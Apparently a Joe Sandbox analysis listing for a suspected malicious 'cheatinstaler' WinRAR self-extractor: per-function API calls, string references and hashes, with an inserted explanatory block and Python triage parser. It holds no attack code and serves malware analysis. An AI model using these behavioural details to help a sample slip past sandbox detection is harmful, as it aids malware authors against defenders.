                                                                                  • API String ID: 2915667086-2207617598
                                                                                  • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                  • Instruction ID: 761a4ef69c758f449675042e8d8950b8644ca56ec398e5a72badf547f4908b66
                                                                                  • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                  • Instruction Fuzzy Hash: 86315765E0DB0682FA14AF27E8F81B5A3A1EF45B90F9C4135E80E437A4EE3CE5458320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: $
                                                                                  • API String ID: 3668304517-227171996
                                                                                  • Opcode ID: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                  • Instruction ID: 8b06bf5c2a49198fdf31984a0d6e1f798e009f49ca3b64b6a70166ab9472d540
                                                                                  • Opcode Fuzzy Hash: 3e5c1c837bf5b094cbf702a79e584555beddaf0efbc8773bf26ad6af60c03e6c
                                                                                  • Instruction Fuzzy Hash: 43F1E362F16A8260EE10AF66D0E41BCA371AB44BA8F985631CB2D177D5DF7CE184C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2940173790-393685449
                                                                                  • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                  • Instruction ID: 4dd78ee23b42f9ed7693df18093352920e4bb2e6f4bc7c767d16f0a15430aebc
                                                                                  • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                  • Instruction Fuzzy Hash: 3AE1E4729187868AE710AF36D4E03ADBBA0FB45798F980135DA8D47A56CF38E285C750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocClearStringVariant
                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                  • API String ID: 1959693985-3505469590
                                                                                  • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                  • Instruction ID: 224c29d2a2dffeca877f6bfedf4809e1c3813504718f25ed3766058c87496602
                                                                                  • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                  • Instruction Fuzzy Hash: D0712F36A14B0595EB20EF26D8E06ADB7B4FB84B98F985132EA4D43B68DF3CD544C710
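The records in this listing carry the raw signals a triage engineer wants from process 3 (the WinRAR-packed stage): a WMI query of Win32_OperatingSystem under ROOT\CIMV2 compared against "Windows 10", Crypt32 CryptProtectMemory/CryptUnprotectMemory strings next to a GetProcAddress-style resolver, and the LoadLibraryExW + GetProcAddress + "api-ms-" pattern that is typical of the MSVC CRT's api-set probing helper rather than malware behaviour. The Python below is an added example, not Joe Sandbox's own code and not part of this report: it parses records in this exact layout (call lines, "• Name: value" fields, a record closed by its Instruction Fuzzy Hash) and labels the ones worth a closer look. The sample text is constructed from values on this page, with the Memory Dump Source lines shortened; the label names and the "$"-only handling are this example's own choices.

```python
"""Triage helper for the per-function 'Similarity' records in a Joe Sandbox
report listing (added example; not part of the report or of Joe Sandbox)."""
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of the listing: three records whose API ID,
# String ID, Opcode ID and call lines are copied from the report above.
SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
Similarity
• API ID: AddressProc$CurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 2915667086-2207617598
• Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
• Instruction Fuzzy Hash: 86315765E0DB0682FA14AF27E8F81B5A3A1EF45B90F9C4135E80E437A4EE3CE5458320
APIs
Strings
Similarity
• API ID: AllocClearStringVariant
• String ID: Name$ROOT\\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
• API String ID: 1959693985-3505469590
• Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
• Instruction Fuzzy Hash: D0712F36A14B0595EB20EF26D8E06ADB7B4FB84B98F985132EA4D43B68DF3CD544C710
APIs
• LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7545774F3), ref: 00007FF754577371
• GetLastError.KERNEL32(?,?,00000000,00007FF7545774F3), ref: 00007FF75457737F
• GetProcAddress.KERNEL32(?,?,00000000,00007FF7545774F3), ref: 00007FF7545773FB
Strings
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
• Instruction Fuzzy Hash: BC31AD21B1A64281EE21BF27B8A0579A295FF08BE4FAD4635DD1D4B390EF3CF5408720
"""

# "Api.MODULE(args), ref: addr" or "Part of subcall function ...: Api.MODULE ref: addr"
CALL_RE = re.compile(
    r"^• (?:Part of subcall function [0-9A-F]+: )?(\w+)\.(\w+)(?:\(.*\),)? ref: ([0-9A-F]+)$")
FIELD_RE = re.compile(
    r"^• (Source File|API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash): ?(.*)$")


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # (api, module, call-site address)
    fields: dict = field(default_factory=dict)  # the "• Name: value" lines

    @property
    def strings(self):
        # Joe Sandbox joins a function's string references with '$'. A field that
        # is only '$' is ambiguous (literal "$" or nothing); keep it as a literal
        # so it is never silently dropped from triage.
        raw = self.fields.get("String ID", "")
        return [raw] if raw == "$" else [s for s in raw.split("$") if s]

    @property
    def api_names(self):
        return sorted({api for api, _, _ in self.calls})


def parse_records(text):
    """Split the listing into records; 'Instruction Fuzzy Hash' closes each one."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        line = line.strip()
        m = CALL_RE.match(line)
        if m:
            cur.calls.append((m.group(1), m.group(2), m.group(3)))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group(1)] = m.group(2).strip()
            if m.group(1) == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records


def triage(rec):
    """Labels worth a closer look. Only literal strings and explicit call lines are
    matched: 'API ID' is a derived, tokenised form (e.g. 'AddressProc' for
    GetProcAddress) and is deliberately not interpreted here."""
    labels, strs = [], rec.strings
    if any(s.upper().startswith("ROOT\\") for s in strs) or any("FROM Win32_" in s for s in strs):
        labels.append("wmi-query")                # host/OS fingerprinting via WMI
    if any(s.startswith(("CryptProtectMemory", "CryptUnprotectMemory")) for s in strs):
        labels.append("dpapi-memory-protection")  # secrets kept encrypted in memory
    if "GetProcAddress" in rec.api_names and any(a.startswith("LoadLibrary") for a in rec.api_names):
        labels.append("runtime-import-resolution")
    if any(s.startswith("api-ms-") for s in strs):
        labels.append("crt-apiset-loader")        # likely CRT noise, not payload logic
    return labels


def summarize(text):
    """(short opcode id, called APIs, labels) per record, flagged records first."""
    rows = [(r.fields.get("Opcode ID", "")[:12], r.api_names, triage(r)) for r in parse_records(text)]
    return sorted(rows, key=lambda row: not row[2])
```

Running `summarize(SAMPLE)` puts the three records in the order Crypt32 resolver, WMI query, CRT loader, each with its labels; on a full export of this section the same call separates the handful of functions that encode sandbox-relevant behaviour from the CRT and WinRAR SFX boilerplate that makes up most of the listing.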
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF754577371
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF75457737F
                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF7545773A9
                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF7545773EF
                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF7545774F3,?,?,?,00007FF75457525E,?,?,?,00007FF754575219), ref: 00007FF7545773FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 2559590344-2084034818
                                                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                  • Instruction ID: ae13d389c809e7e9ab7ac64d3e4eb44025ac6b3e367bd208ddd33ca2b39ca814
                                                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                  • Instruction Fuzzy Hash: BC31AD21B1A64281EE21BF27B8A0579A295FF08BE4FAD4635DD1D4B390EF3CF5408720
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF75457162B
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF754571648
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF754571664
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                  • API String ID: 667068680-1718035505
                                                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                  • Instruction ID: 538c2931e39e5da91b699ae0f9ffdf3945c098fbb9d4fa6f24cbf4f7eb5d8669
                                                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                  • Instruction Fuzzy Hash: 36110C21E19B0291FE65AF03A9E4274A2A5BF087D4FDC5439C81F0AB54EE3CA955C630
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF7545551A4: GetVersionExW.KERNEL32 ref: 00007FF7545551D5
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455ED8C
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455ED98
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EDA8
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EDB6
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EDC4
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF754545AB4), ref: 00007FF75455EE05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                  • Instruction ID: 1a217dfba699840ac78b4c51a90c822a530354d7c4469e1bc80c175d48557e22
                                                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                  • Instruction Fuzzy Hash: 8E518CB2B106518BEB14DFA9D4901AC77B1F748B88BA4403AEE0E57B58DF38E546C710
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                  • Instruction ID: 72cbc550a727429fcddc3def5241fe854453b810d6344542c2fab9c7bf874eda
                                                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                  • Instruction Fuzzy Hash: 27313B66B10A518EFB14DFB5D8901BC7770FB08758B98502AEE0E97A58EF38D495C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                  • API String ID: 3668304517-630704357
                                                                                  • Opcode ID: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                  • Instruction ID: 69234210f91ab7377f60d49eda7973e4ae3a1fc1a178743cd287e2ad545cfb7e
                                                                                  • Opcode Fuzzy Hash: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                  • Instruction Fuzzy Hash: 8FA1A122A14A4680EA04AF37D4E52FCA361FF40BA8F985231ED5D076EADF3CE545C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 2889003569-2084237596
                                                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                  • Instruction ID: 6fb44ae6f70d5024178003ee95594d45bca4cb891eb8d14fddd0d0061891ecca
                                                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                  • Instruction Fuzzy Hash: A991BFB3A08B958AE710EF66E4903ADBBA0F704788F584139EE4D17B55DF38D295CB40
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                  • String ID: csm$f
                                                                                  • API String ID: 2395640692-629598281
                                                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                  • Instruction ID: 759ad9493ba1c1f0a802c3951c61b3550b3d87df1046c1d6d615e97111d3e4f4
                                                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                  • Instruction Fuzzy Hash: 1451C632A1960686EB14EF17E494B29B795FB40BC8F988030DA5E47B48DF78EA41C790
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 2102711378-639343689
                                                                                  • Opcode ID: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                  • Instruction ID: 99d225fedd3a44ccc3e93a5caca19aeea6787f980e9cc918a068f84861ec98f0
                                                                                  • Opcode Fuzzy Hash: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                  • Instruction Fuzzy Hash: 3E51C562F1874245FB11FF67D8E02BDA361AF857A4F980130DE1D1B696EE3CA589C220
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Rect
                                                                                  • String ID: RarHtmlClassName
                                                                                  • API String ID: 2396740005-1658105358
                                                                                  • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                  • Instruction ID: 0c42e94229bd7c675b24ef3844a8b955d62f6c9d5d04e9638cae15f900e42065
                                                                                  • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                  • Instruction Fuzzy Hash: 3C519622A09B8296EA24AF33E4A437EE360FF85780F884435DE4E47B55DF3CE4458710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
